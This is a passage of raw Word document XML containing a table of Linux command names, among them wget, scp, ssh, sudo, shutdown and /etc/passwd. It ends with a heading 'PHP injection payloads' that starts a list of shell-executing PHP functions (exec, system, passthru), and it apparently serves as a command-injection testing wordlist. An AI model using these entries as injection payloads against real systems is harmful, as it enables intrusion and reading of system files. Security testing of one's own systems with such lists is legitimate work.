          <w:p w14:paraId="4D2DC059" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>rmdir</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F38F20B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>scp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76AA766C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>shutdown</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="048DF2C4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sleep</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54A70179" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sort</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25F0689C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>split</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E9E07F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315627FA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>stat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5148725E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6358641A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51051F1F" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>sum</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C87D4C2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>systemctl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F9F0EB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tac</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C9C2410" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tail</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D205899" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>talk</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF3B6CD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CB8D2C7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tee</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="397B0352" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tree</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F3B3143" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>time</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CDDB453" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>top</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="405BBDF4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>touch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A92FF67" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>tr</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145CCA05" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>uname</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46BECCC0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>uniq</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20C1BEAA" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>uptime</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43BC3C3A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275F46F4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>vim/vi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D31B5DE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>w</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="471AB41B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>wall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="667C3AF6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>watch</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46EED053" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>wc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BADBA4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6588F419" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>whatis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520954E6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>which</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B0AD206" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>who</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7927FB2E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>whereis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDC0D19" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>xargs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEF3573" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>yes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE24D8C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>youtube-dl</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C5ECB8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>zcmp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0417283D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>zdiff</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="076F5407" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F735EE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>zz</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ADCDDCE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>/etc</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDC6F9C" w14:textId="7635E25A" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42E73DEE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B683538" w14:textId="3163FABE" w:rsidR="00564269" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PHP injection payloads</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C3F72" w14:paraId="3F947426" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EDAB549" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>exec()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2769C0E6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>system()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F19EDBB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>passthru()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C1DEEC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>chdir()</w:t>
            </w:r>
          </w:p>
